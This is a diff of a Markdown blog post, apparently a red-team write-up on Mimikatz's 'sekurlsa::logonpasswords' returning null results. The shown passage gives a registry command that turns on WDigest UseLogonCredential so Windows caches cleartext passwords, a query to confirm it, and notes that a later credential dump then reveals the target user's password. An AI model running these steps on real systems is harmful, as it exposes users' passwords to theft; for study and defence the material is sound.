bitdecay/bitdecay.github.io/_posts/2025-10-24-Understanding sekurlsa ogonpasswords Null Results.md

 `reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f`

+After the command is completed, check the wdigest registry to see if the registry key was added to wdigest.

+`reg query HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest`

 ![uselogoncreds](/images/2025/10-24-uselogoncredentials.png)

-When the command is completed, log off and log back on (or restart) to make the setting effective.
+Now log off and log back on (or restart) to make the setting effective.
 Now when you dump credentials with `sekurlsa::logonpasswords`, you should see the target user’s cleartext password.

 ![plaintext password](/images/2025/10-24-plaintext.png)